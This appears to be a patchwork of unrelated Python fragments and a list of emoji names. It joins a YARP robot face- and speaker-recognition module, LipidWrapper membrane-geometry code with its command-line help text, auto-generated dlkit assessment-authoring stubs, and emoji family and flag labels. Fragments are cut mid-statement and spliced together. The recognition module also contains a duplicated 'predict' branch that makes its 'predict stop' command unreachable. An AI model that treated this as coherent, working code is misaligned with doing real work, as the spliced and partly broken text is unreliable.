info(f"Unable to find dataset {EmbeddingsHandler(os.path.join(self.dataset_path, 'face'))} \
or model {self.face_model_path}")
return False
return True
def interruptModule(self):
print("[INFO] Stopping the module")
self.audio_in_port.interrupt()
self.label_outputPort.interrupt()
self.eventPort.interrupt()
self.handle_port.interrupt()
self.image_in_port.interrupt()
self.face_coord_port.interrupt()
return True
def close(self):
self.audio_in_port.close()
self.handle_port.close()
self.label_outputPort.close()
self.image_in_port.close()
self.eventPort.close()
self.face_coord_port.close()
return True
def respond(self, command, reply):
ok = False
# Is the command recognized
rec = False
reply.clear()
if command.get(0).asString() == "quit":
reply.addString("quitting")
return False
elif command.get(0).asString() == "start":
reply.addString("ok")
self.process = True
elif command.get(0).asString() == "predict":
self.predict = True
reply.addString("ok")
elif command.get(0).asString() == "stop":
self.process = False
reply.addString("ok")
elif command.get(0).asString() == "predict":
if command.get(1).asString() == "stop":
self.predict = False
reply.addString("ok")
elif command.get(0).asString() == "check":
if command.get(1).asString() == "tracker":
new_detection = []
new_detection.append(command.get(2).asList().get(0).asDouble())
new_detection.append(command.get(2).asList().get(1).asDouble())
new_detection.append(command.get(2).asList().get(2).asDouble())
new_detection.append(command.get(2).asList().get(3).asDouble())
name_to_assign, id_to_assign = self.check_existing_face(new_detection)
if name_to_assign:
reply.addString(name_to_assign)
reply.addString(id_to_assign)
else:
reply.addString("nack")
elif command.get(0).asString() == "save":
if command.get(1).asString() == "face":
if command.get(2).asString() == "start":
self.save_face = True
else:
name = command.get(2).asString().lower()
if name in self.db_embeddings_face.data_dict.keys():
self.db_embeddings_face.data_dict[name] = self.db_embeddings_face.data_dict[name] + self.face_emb
else:
self.db_embeddings_face.data_dict[name] = self.face_emb
self.database.save_faces(self.faces_img, self.face_emb, name)
self.save_face = False
self.faces_img = []
self.face_emb = []
reply.addString("ok")
elif command.get(0).asString() == "reset":
self.db_embeddings_face.excluded_entities = []
elif command.get(0).asString() == "set":
if command.get(1).asString() == "thr":
if command.get(2).asString() == "audio":
self.threshold_audio = command.get(3).asDouble()
self.db_embeddings_audio.threshold = self.threshold_audio
reply.addString("ok")
elif command.get(2).asString() == "face":
self.threshold_face = command.get(3).asDouble() if command.get(3).asDouble() > 0 else self.threshold_face
self.db_embeddings_face.threshold = self.threshold_face
reply.addString("ok")
else:
reply.addString("nack")
else:
reply.addString("nack")
elif command.get(0).asString() == "get":
if command.get(1).asString() == "thr":
if command.get(2).asString() == "audio":
reply.addDouble(self.threshold_audio)
elif command.get(2).asString() == "face":
reply.addDouble(self.threshold_face)
else:
reply.addString("nack")
elif command.get(1).asString() == "face":
self.face_coord_request = [command.get(2).asDouble(), command.get(3).asDouble(), command.get(4).asDouble(),
command.get(5).asDouble()]
reply.addString("ok")
else:
reply.addString("nack")
else:
reply.addString("nack")
return True
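    # Command grammar implemented by respond() above, reachable e.g. with
    # `yarp rpc /PersonRecognition` (summary derived from the code):
    #
    #     start | stop                      enable / disable processing
    #     predict [stop]                    enable (or disable) prediction
    #     check tracker (<x> <y> <w> <h>)   match a tracked face against known ones
    #     save face start | <name>          start collecting faces / store them under <name>
    #     set thr audio|face <value>        set a recognition threshold
    #     get thr audio|face                query a recognition threshold
    #     get face <x> <y> <w> <h>          request recognition for the given coordinates
    #     reset                             clear excluded entities
    #     quit                              stop the module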
def getPeriod(self):
"""
Module refresh rate.
Returns : The period of the module in seconds.
"""
return 0.05
def record_audio(self):
self.sound = self.audio_in_port.read(False)
if self.sound and self.is_voice:
chunk = np.zeros((self.sound.getChannels(), self.sound.getSamples()), dtype=np.float32)
self.nb_samples_received += self.sound.getSamples()
for c in range(self.sound.getChannels()):
for i in range(self.sound.getSamples()):
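                    # scale signed 16-bit PCM samples to floats in [-1.0, 1.0)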
chunk[c][i] = self.sound.get(i, c) / 32768.0
self.audio.append(chunk)
return True
return False
def read_image(self):
input_yarp_image = self.image_in_port.read(False)
if input_yarp_image:
input_yarp_image.setExternal(self.input_img_array, self.width_img, self.height_img)
self.frame = np.frombuffer(self.input_img_array, dtype=np.uint8).reshape(
(self.height_img, self.width_img, 3)).copy()
return True
return False
def check_voice(self):
if self.eventPort.getInputCount():
event_name = self.eventPort.read(False)
if event_name:
event_name = event_name.get(0).asString()
if event_name == "start_voice":
self.is_voice = True
elif event_name == "stop_voice":
self.audio = []
self.nb_samples_received = 0
self.is_voice = False
else:
pass
def get_face_coordinate(self):
if self.face_coord_port.getInputCount():
self.coord_face = self.face_coord_port.read(False)
return self.coord_face is not None
self.coord_face = None
return False
def set_name_memory(self, face_id, face_name):
if self.opc_port.getOutputCount():
reply = yarp.Bottle()
cmd = yarp.Bottle("ask")
list_condition = cmd.addList()
cond1 = list_condition.addList()
cond1.addString("id_tracker")
cond1.addString("==")
cond1.addString(face_id)
self.opc_port.write(cmd, reply)
list_id = reply.get(1).asList().get(1).asList()
if list_id.size():
cmd = yarp.Bottle()
cmd.addString("get")
list_all = cmd.addList()
list_1 = list_all.addList()
list_1.addString("id")
list_1.addInt(list_id.get(0).asInt())
list_2 = list_all.addList()
list_2.addString("propSet")
list_3 = list_2.addList()
list_3.addString("verified")
reply_ver = yarp.Bottle()
self.opc_port.write(cmd, reply_ver)
print("Sent cmd to OPC {}, and received response {}".format(cmd.toString(), reply_ver.toString()))
verified = reply_ver.get(1).asList().get(0).asList().get(1).asInt()
if verified == 0:
reply2 = yarp.Bottle()
cmd = yarp.Bottle()
cmd.addString("set")
list_cmd = cmd.addList()
id_cmd = list_cmd.addList()
id_cmd.addString("id")
id_cmd.addInt(list_id.get(0).asInt())
label_cmd = list_cmd.addList()
label_cmd.addString("label_tracker")
label_cmd.addString(face_name.strip())
# cmd_str = "set ((id " + str(list_id.get(0).asInt()) + ") (label_tracker" + face_name + "))"
self.opc_port.write(cmd, reply2)
print("Sent cmd to OPC {} and received reply {}".format(cmd.toString(), reply2.toString()))
return "ack" + reply2.get(0).asString()
return False
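    # For readability, the bottles assembled above correspond to these textual
    # OPC commands (sketch):
    #
    #     ask ((id_tracker == <face_id>))
    #     get ((id <opc_id>) (propSet (verified)))
    #     set ((id <opc_id>) (label_tracker <face_name>))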
def get_name_in_memory(self):
if self.opc_port.getOutputCount():
reply = yarp.Bottle()
cmd = yarp.Bottle("ask")
list_condition = cmd.addList()
cond1 = list_condition.addList()
cond1.addString("verified")
cond1.addString("==")
cond1.addInt(1)
self.opc_port.write(cmd, reply)
list_id = reply.get(1).asList().get(1).asList()
for i in range(list_id.size()):
cmd_str = "get ((id " + str(list_id.get(i).asInt()) + ") (propSet (label_tracker)))"
cmd = yarp.Bottle(cmd_str)
reply_id = yarp.Bottle()
self.opc_port.write(cmd, reply_id)
if reply_id.size() > 0:
name = reply_id.get(1).asList().get(0).asList().get(1).asString()
self.db_embeddings_face.excluded_entities.append(name)
self.db_embeddings_audio.excluded_entities.append(name)
def get_name_to_verify(self):
if self.opc_port.getOutputCount():
reply = yarp.Bottle()
cmd = yarp.Bottle("ask")
list_condition = cmd.addList()
cond1 = list_condition.addList()
cond1.addString("verified")
cond1.addString("==")
cond1.addInt(1)
list_condition.addString("&&")
cond2 = list_condition.addList()
cond2.addString("active")
cond2.addString("==")
cond2.addInt(0)
self.opc_port.write(cmd, reply)
list_id = reply.get(1).asList().get(1).asList()
name_to_verify = []
id_to_verify = []
if list_id.size() > 0:
reply_id = yarp.Bottle()
for i in range(list_id.size()):
cmd_str = "get ((id " + str(list_id.get(i).asInt()) + ") (propSet (label_tracker id_tracker)))"
cmd = yarp.Bottle(cmd_str)
self.opc_port.write(cmd, reply_id)
name = reply_id.get(1).asList().get(1).asList().get(1).asString()
id = reply_id.get(1).asList().get(0).asList().get(1).asString()
name_to_verify.append(name)
id_to_verify.append(id)
return name_to_verify, id_to_verify
return False
def updateModule(self):
current_face_emb = []
current_id_faces = []
speaker_name, audio_score = "unknown", 0
self.check_voice()
record_image = self.read_image()
record_audio = self.record_audio()
self.get_name_in_memory()
self.get_face_coordinate()
if self.process:
if record_audio and self.nb_samples_received >= self.length_input * self.sound.getFrequency():
print("Computing Speaker Embedding")
audio_signal = self.format_signal(self.audio)
# Compute speaker embeddings and do speaker prediction only if the audio database is updated with
# the same people folders as the face embedding folders (make empty folders?)
self.speaker_emb = self.get_audio_embeddings(audio_signal)
self.audio = []
self.nb_samples_received = 0
speaker_name, audio_score = self.predict_speaker(self.speaker_emb)
if record_image and self.frame.size != 0 and self.coord_face:
try:
current_id_faces, self.coord_face = format_face_coord(self.coord_face)
face_img = [face_alignement(f, self.frame) for f in self.coord_face]
current_face_emb = self.get_face_embeddings(face_img)
if self.save_face and len(current_face_emb) > 0:
self.faces_img = self.faces_img + | |
numpy array, the point (or an approximation thereof when an exact solution is not possible) where the defined lines intersect
"""
# first, define the lines from the provided points
pt1 = a1
vec1 = a2-a1
pt2 = b1
vec2 = b2-b1
# now get the points on the lines that are closest to each other
coeffs = numpy.vstack((vec2, -vec1)).T
best_sol_all = numpy.linalg.lstsq(coeffs, pt1-pt2)
best_sol = best_sol_all[0]
if best_sol_all[1][0] == 0.0: # an exact solution because the lines intersect
return vec1 * best_sol[1] + pt1
else: # return the average pt of the two points that are closest to each other
close_pt1 = vec1 * best_sol[1] + pt1
close_pt2 = vec2 * best_sol[0] + pt2
return (close_pt1 + close_pt2) * 0.5 # return the average pt
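        # Worked example (sketch): for the crossing lines through
        # (0,0,0)->(1,0,0) and (0,1,0)->(0,-1,0), the least-squares system has
        # a zero residual, so seg_intersect takes the exact-solution branch and
        # returns the true intersection point (0, 0, 0):
        #
        #     seg_intersect(numpy.array([0., 0., 0.]), numpy.array([1., 0., 0.]),
        #                   numpy.array([0., 1., 0.]), numpy.array([0., -1., 0.]))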
# get the corners of the new triangle
        pt1 = seg_intersect(center_to_center_vec_new_length[0], second_points_on_new_side[0], center_to_center_vec_new_length[1], second_points_on_new_side[1])
        pt2 = seg_intersect(center_to_center_vec_new_length[0], second_points_on_new_side[0], center_to_center_vec_new_length[2], second_points_on_new_side[2])
        pt3 = seg_intersect(center_to_center_vec_new_length[2], second_points_on_new_side[2], center_to_center_vec_new_length[1], second_points_on_new_side[1])
new_pts = numpy.vstack((pt1, pt2, pt3))
return Triangle(new_pts)
def near_other_triangle(self, other_triangle, params):
"""Determines if another triangle is near this one
Arguments:
other_triangle -- A Triangle object, the other triangle to be evaluated
params -- A dictionary, the user-specified command-line parameters
Returns:
        A boolean, True if the two triangles are near each other, False otherwise
"""
# check if the two triangles share a corner
dists_between_triangle_pts = cdist(self.points, other_triangle.points)
        if (dists_between_triangle_pts == 0.0).any(): return True # so they are adjacent
# check if the distance to their centers is too close as well
dist_between_center_points = numpy.linalg.norm(self.center() - other_triangle.center())
        if dist_between_center_points < params['triangle_center_proximity_cutoff_distance']: return True
        return False
############### GET COMMANDLINE PARAMETERS ###############
def get_commandline_parameters(argv):
"""Get the user-defined command-line parameters
Returns:
A dictionary, the user-specified command-line parameters
"""
# first check if the user has requested the help file
if '--help' in [t.lower() for t in argv]:
        print()
        print("The initial lipid model")
        print("=======================")
        print()
        print(textwrap.fill("--lipid_pdb_filename: This parameter specifies a PDB file containing an all-atom model of a planar lipid bilayer. LipidWrapper will wrap this lipid around the user-generated mesh. Example: --lipid_pdb_filename lipid.pdb", 70, subsequent_indent=" "))
        print(textwrap.fill("--lipid_headgroup_marker: A unique atom representing the headgroup of each lipid residue must be specified. The --lipid_headgroup_marker accepts a comma-separated list of atom specifications (RESNAME_ATOMNAME). If either RESNAME or ATOMNAME is omitted, any value will be accepted. By default, LipidWrapper identifies lipid headgroups by looking for any atom named \"P\" (_P) or any atom named \"O3\" belonging to a cholesterol molecule (CHL1_O3). Example: --lipid_headgroup_marker \"_P,CHL1_O3\"", 70, subsequent_indent=" "))
        print()
        print("Methods for creating a surface mesh")
        print("===================================")
        print()
        print(textwrap.fill("--surface_equation: Generate a surface mesh from a python-formatted equation defining z, given x and y. The --min_x, --max_x, --min_y, and --max_y parameters are used to specify the region over which the function should be evaluated. The --step_x and --step_y parameters define the x-y distance between adjacent points. Python functions from the math, numpy, and scipy modules can be used. Example: --surface_equation \"z = 250*numpy.sin(x*x/60000 +y*y/60000)\"", 70, subsequent_indent=" "))
        print(textwrap.fill("--surface_filename: If this parameter specifies a file with the PDB extension, a surface mesh is generated from the coordinates of the PDB atoms. Example: --surface_filename mymesh.pdb", 70, subsequent_indent=" "))
        print(textwrap.fill("--surface_filename: If this parameter specifies a file with the DAE extension, the mesh points and triangulations will be taken from the file. Example: --surface_filename mymodel.dae", 70, subsequent_indent=" "))
        print(textwrap.fill("--surface_filename: If this parameter specifies a file that does not have the PDB extension, the file is assumed to be a gray-scale image, where black represents regions that are topologically low, and white represents regions that are topologically high. The --min_x, --max_x, --min_y, and --max_y parameters are used to specify the region where the mesh should be generated. The --step_x and --step_y parameters define the x-y distance between adjacent points. The --max_height parameter determines the height of the bilayer model at those locations where the image is white; black regions are assigned a height of 0. This feature is only available if the python PIL module has been installed on your system. Example: --surface_filename mymesh.png", 70, subsequent_indent=" "))
        print()
        print("Methods for resolving lipid clashes")
        print("===================================")
        print()
        print(textwrap.fill("--delete_clashing_lipids: It's common for lipids to sterically clash at the interface of two adjacent surface-mesh tessellated triangles. If this parameter is set to TRUE, any clashing lipids are deleted. Example: --delete_clashing_lipids TRUE", 70, subsequent_indent=" "))
        print(textwrap.fill("--clash_cutoff: If you do choose to delete clashing lipids, this parameter determines how close two atoms must be (in Angstroms) to constitute a steric clash. Example: --clash_cutoff 2.0", 70, subsequent_indent=" "))
        print(textwrap.fill("--clashing_potential_margin: Lipid clashes occur at the edges of adjacent tessellated triangles. If these triangles are very large, it's faster to only check for clashes and holes near the triangle edges. This variable specifies how far from the edges, in Angstroms, that LipidWrapper should look for clashes and holes. Example: --clashing_potential_margin 25.0", 70, subsequent_indent=" "))
        print(textwrap.fill("--fill_holes: Deleting lipids often leaves holes in the membrane. If this parameter is set to TRUE, LipidWrapper tries to fill the hole. Example: --fill_holes TRUE", 70, subsequent_indent=" "))
        print(textwrap.fill("--very_distant_lipids_cutoff: LipidWrapper determines if two lipids clash by comparing the distance between every atom in the first lipid with every atom in the second lipid. This can be computationally expensive. However, sometimes two lipids are so distant from each other, that it's obvious there are no clashes, making the pair-wise comparison unnecessary. Before performing this expensive pair-wise comparison, LipidWrapper calculates the distance between one atom of each lipid. If this distance is greater than this user-specified cutoff, the program will simply assume there are no clashes. WARNING: Remember to consider the width of your lipid bilayer when choosing this value. Adjacent lipids on opposite sides of the bilayer can seem distant when considering the distance between their headgroups, for example. Example: --very_distant_lipids_cutoff 50.0", 70, subsequent_indent=" "))
        print(textwrap.fill("--triangle_center_proximity_cutoff_distance: Lipid steric clashes/holes typically occur between lipids that belong to adjacent tessellated triangles. However, if tessellated triangles are small enough, clashes are possible between lipids that belong to non-adjacent triangles as well. Consequently, in addition to checking for adjacency, LipidWrapper also checks the distance between the triangle centers, using this user-specified value as a cutoff. Example: --triangle_center_proximity_cutoff_distance 50.0", 70, subsequent_indent=" "))
        print(textwrap.fill("--fill_hole_exhaustiveness: Essentially, how long LipidWrapper should try to fill the holes. Example: --fill_hole_exhaustiveness 10", 70, subsequent_indent=" "))
        print(textwrap.fill("--memory_optimization_factor: When the tessellated triangles are very large and consequently contain many individual lipids, the extensive pairwise distance comparisons required can result in memory errors. This parameter tells LipidWrapper to divide the list of atoms being compared into smaller chunks. The pairwise distance comparison is performed piecewise on each chunk-chunk pair and so uses less memory, albeit at the expense of speed. Only increase the value of this parameter if you run into memory errors. Example: --memory_optimization_factor 1", 70, subsequent_indent=" "))
        print()
        print("Additional options")
        print("==================")
        print()
        print(textwrap.fill("--number_of_processors: Using multiple processors can significantly increase the speed of the LipidWrapper algorithm. Example: --number_of_processors 8", 70, subsequent_indent=" "))
        print(textwrap.fill("--show_grid_points: Aside from producing PDB coordinates for lipid atoms, additional coordinates will be appended to the bottom of the output containing \"atoms\" named \"X\" that specify the location of the surface mesh points. Example: --show_grid_points TRUE", 70, subsequent_indent=" "))
        print(textwrap.fill("--create_triangle_tcl_file: A separate file named \"triangles.tcl\" will be generated containing a tcl script that can be run in VMD to visualize the mesh surface. Example: --create_triangle_tcl_file TRUE", 70, subsequent_indent=" "))
        print(textwrap.fill("--output_directory: If an output directory is specified, all LipidWrapper output files, as well as additional files representing the intermediate steps required
"""Manager utility implementations of assessment.authoring managers."""
# pylint: disable=no-init
# Numerous classes don't require __init__.
# pylint: disable=too-many-public-methods
# Number of methods are defined in specification
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
from ..osid import managers as osid_managers
from ..osid.osid_errors import NullArgument
from ..osid.osid_errors import Unimplemented
from ..type.objects import TypeList
from dlkit.abstract_osid.assessment_authoring import managers as abc_assessment_authoring_managers
class AssessmentAuthoringProfile(abc_assessment_authoring_managers.AssessmentAuthoringProfile, osid_managers.OsidProfile):
"""The ``AssessmentAuthoringProfile`` describes the interoperability among assessment authoring services."""
def supports_visible_federation(self):
"""Tests if federation is visible.
        return: (boolean) - ``true`` if visible federation is supported,
            ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
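    # Consumer sketch (assumption, not part of this class): OSID consumers are
    # expected to test these capability flags before requesting the matching
    # session from a manager; the session getter below is hypothetical.
    #
    #     profile = AssessmentAuthoringProfile()
    #     if profile.supports_assessment_part_lookup():
    #         session = manager.get_assessment_part_lookup_session()
    #     else:
    #         ...  # fall back, or expect Unimplemented from the manager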
def supports_assessment_part_lookup(self):
"""Tests if looking up assessment part is supported.
return: (boolean) - ``true`` if assessment part lookup is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_query(self):
"""Tests if querying assessment part is supported.
return: (boolean) - ``true`` if assessment part query is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_search(self):
"""Tests if searching assessment part is supported.
return: (boolean) - ``true`` if assessment part search is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_admin(self):
"""Tests if an assessment part administrative service is supported.
return: (boolean) - ``true`` if assessment part administration
is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_notification(self):
"""Tests if an assessment part notification service is supported.
return: (boolean) - ``true`` if assessment part notification is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_bank(self):
"""Tests if an assessment part bank lookup service is supported.
return: (boolean) - ``true`` if an assessment part bank lookup
service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_bank_assignment(self):
"""Tests if an assessment part bank service is supported.
return: (boolean) - ``true`` if assessment part bank assignment
service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_smart_bank(self):
"""Tests if an assessment part bank lookup service is supported.
return: (boolean) - ``true`` if an assessment part bank service
is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_item(self):
"""Tests if an assessment part item service is supported for looking up assessment part and item mappings.
return: (boolean) - ``true`` if assessment part item service is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_assessment_part_item_design(self):
"""Tests if an assessment part item design session is supported.
return: (boolean) - ``true`` if an assessment part item design
service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_lookup(self):
"""Tests if looking up sequence rule is supported.
return: (boolean) - ``true`` if sequence rule lookup is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_query(self):
"""Tests if querying sequence rule is supported.
return: (boolean) - ``true`` if sequence rule query is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_search(self):
"""Tests if searching sequence rule is supported.
return: (boolean) - ``true`` if sequence rule search is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_admin(self):
"""Tests if a sequence rule administrative service is supported.
return: (boolean) - ``true`` if sequence rule administration is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_notification(self):
"""Tests if a sequence rule notification service is supported.
return: (boolean) - ``true`` if sequence rule notification is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_bank(self):
"""Tests if a sequence rule bank lookup service is supported.
return: (boolean) - ``true`` if a sequence rule bank lookup
service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_bank_assignment(self):
"""Tests if a sequence rule bank service is supported.
return: (boolean) - ``true`` if sequence rule bank assignment
service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_smart_bank(self):
"""Tests if a sequence rule bank lookup service is supported.
return: (boolean) - ``true`` if a sequence rule bank service is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_lookup(self):
"""Tests if looking up sequence rule enablers is supported.
return: (boolean) - ``true`` if sequence rule enabler lookup is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_query(self):
"""Tests if querying sequence rule enablers is supported.
return: (boolean) - ``true`` if sequence rule enabler query is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_search(self):
"""Tests if searching sequence rule enablers is supported.
return: (boolean) - ``true`` if sequence rule enabler search is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_admin(self):
"""Tests if a sequence rule enabler administrative service is supported.
return: (boolean) - ``true`` if sequence rule enabler
administration is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_notification(self):
"""Tests if a sequence rule enabler notification service is supported.
return: (boolean) - ``true`` if sequence rule enabler
notification is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_bank(self):
"""Tests if a sequence rule enabler bank lookup service is supported.
return: (boolean) - ``true`` if a sequence rule enabler bank
lookup service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_bank_assignment(self):
"""Tests if a sequence rule enabler bank service is supported.
return: (boolean) - ``true`` if sequence rule enabler bank
assignment service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_smart_bank(self):
"""Tests if a sequence rule enabler bank lookup service is supported.
return: (boolean) - ``true`` if a sequence rule enabler bank
service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_rule_lookup(self):
"""Tests if a sequence rule enabler rule lookup service is supported.
return: (boolean) - ``true`` if a sequence rule enabler rule
lookup service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_rule_application(self):
"""Tests if a sequence rule enabler rule application service is supported.
return: (boolean) - ``true`` if sequence rule enabler rule
application service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def get_assessment_part_record_types(self):
"""Gets the supported ``AssessmentPart`` record types.
return: (osid.type.TypeList) - a list containing the supported
``AssessmentPart`` record types
*compliance: mandatory -- This method must be implemented.*
"""
return TypeList([])
assessment_part_record_types = property(fget=get_assessment_part_record_types)
def supports_assessment_part_record_type(self, assessment_part_record_type=None):
"""Tests if the given ``AssessmentPart`` record type is supported.
arg: assessment_part_record_type (osid.type.Type): a ``Type``
indicating an ``AssessmentPart`` record type
return: (boolean) - ``true`` if the given record type is
supported, ``false`` otherwise
raise: NullArgument - ``assessment_part_record_type`` is
``null``
*compliance: mandatory -- This method must be implemented.*
"""
if assessment_part_record_type is None:
raise NullArgument()
return False
def get_assessment_part_search_record_types(self):
"""Gets the supported ``AssessmentPart`` search record types.
return: (osid.type.TypeList) - a list containing the supported
``AssessmentPart`` search record types
*compliance: mandatory -- This method must be implemented.*
"""
return TypeList([])
assessment_part_search_record_types = property(fget=get_assessment_part_search_record_types)
def supports_assessment_part_search_record_type(self, assessment_part_search_record_type=None):
"""Tests if the given ``AssessmentPart`` search record type is supported.
arg: assessment_part_search_record_type (osid.type.Type): a
``Type`` indicating an ``AssessmentPart`` search record
type
return: (boolean) - ``true`` if the given search record type is
supported, ``false`` otherwise
raise: NullArgument - ``assessment_part_search_record_type`` is
``null``
*compliance: mandatory -- This method must be implemented.*
"""
if assessment_part_search_record_type is None:
raise NullArgument()
return False
def | |
Family - Woman: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Kalbajar (AZ-KAL)
🏴 Flag for Gadabay (AZ-GAD)
🏴 Flag for Lachin (AZ-LAC)
🏴 Flag for Lankaran (AZ-LA)
🏴 Flag for Ho Chi Minh City (VN-SG)
🏴 Flag for Lerik (AZ-LER)
🏴 Flag for Mingachevir (AZ-MI)
👩🏾👨🏾👧🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Naftalan (AZ-NA)
🏴 Flag for Masally (AZ-MAS)
👨❤️👩 Couple With Heart - Man, Woman
🏴 Flag for Lankaran District (AZ-LAN)
👩🏼👨🏼👧🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏽❤️💋👨🏾 Kiss - Woman: Medium Skin Tone, Man: Medium-Dark Skin Tone
👩🏿👧🏿👶🏿 Family - Woman: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Neftchala (AZ-NEF)
🏴 Flag for Nakhchivan AR (AZ-NX)
🏴 Flag for Celje (SI-011)
🏴 Flag for Panevėžio Municipality (LT-32)
👩🏿❤️💋👩🏽 Kiss - Woman: Dark Skin Tone, Woman: Medium Skin Tone
👨🏻❤️👩🏿 Couple With Heart - Man: Light Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Ismailli (AZ-ISM)
Tag Latin Small Letter H
👩🏾❤️👨🏻 Couple With Heart - Woman: Medium-Dark Skin Tone, Man: Light Skin Tone
👩🏻👶🏻 Family - Woman: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Nana-Mambéré (CF-NM)
🏴 Flag for Gobustan (AZ-QOB)
👩🏿❤️💋👨🏻 Kiss - Woman: Dark Skin Tone, Man: Light Skin Tone
👩🏿❤️💋👩🏿 Kiss - Woman: Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Qubadli (AZ-QBI)
🏴 Flag for Qazakh (AZ-QAZ)
🏴 Flag for Braşov (RO-BV)
👨👩👧👶 Family: Man, Woman, Girl, Baby
🏴 Flag for Quba (AZ-QBA)
🏴 Flag for Qabala (AZ-QAB)
🏴 Flag for Uri (CH-UR)
🏴 Flag for Oghuz (AZ-OGU)
🏴 Flag for Qakh (AZ-QAX)
🏴 Flag for Šmarješke Toplice (SI-206)
👨🏾❤️💋👩🏿 Kiss - Man: Medium-Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Saint Peter (AG-07)
👨🏻👩🏻👧🏻👧🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Maryland (LR-MY)
🏴 Flag for South Australia (AU-SA)
🏴 Flag for Qusar (AZ-QUS)
🏴 Flag for Sabirabad (AZ-SAB)
👨❤️👩🏽 Couple With Heart - Man, Woman: Medium Skin Tone
👨❤️👩🏼 Couple With Heart - Man, Woman: Medium-Light Skin Tone
🏴 Flag for Saatly (AZ-SAT)
🏴 Flag for Shabran (AZ-SBN)
👨🏼❤️👩🏽 Couple With Heart - Man: Medium-Light Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Shaki District (AZ-SAK)
🏴 Flag for Casanare (CO-CAS)
👨👩👶👶 Family: Man, Woman, Baby, Baby
🏴 Flag for Shirvan (AZ-SR)
🏴 Flag for Shusha (AZ-SUS)
🏴 Flag for Valais (CH-VS)
👩🏽👶🏽 Family - Woman: Medium Skin Tone, Baby: Medium Skin Tone
👩🏻❤️💋👨🏿 Kiss - Woman: Light Skin Tone, Man: Dark Skin Tone
🏴 Flag for Shaki (AZ-SA)
🏴 Flag for Martinique (FR-MQ)
🏴 Flag for Sumqayit (AZ-SM)
🏴 Flag for Siazan (AZ-SIY)
🏴 Flag for Shamakhi (AZ-SMI)
👩🏿❤️💋👨 Kiss - Woman: Dark Skin Tone, Man
🏴 Flag for Samukh (AZ-SMX)
👨🏻👩🏻👧🏻👶🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Tovuz (AZ-TOV)
🏴 Flag for Khachmaz (AZ-XAC)
🏴 Flag for Ujar (AZ-UCA)
🏴 Flag for Tartar (AZ-TAR)
👨🏿❤️💋👨🏻 Kiss - Man: Dark Skin Tone, Man: Light Skin Tone
👩🏼👧🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏽👩🏽👧🏽👶🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Khizi (AZ-XIZ)
👨🏽❤️👨🏼 Couple With Heart - Man: Medium Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Khojali (AZ-XCI)
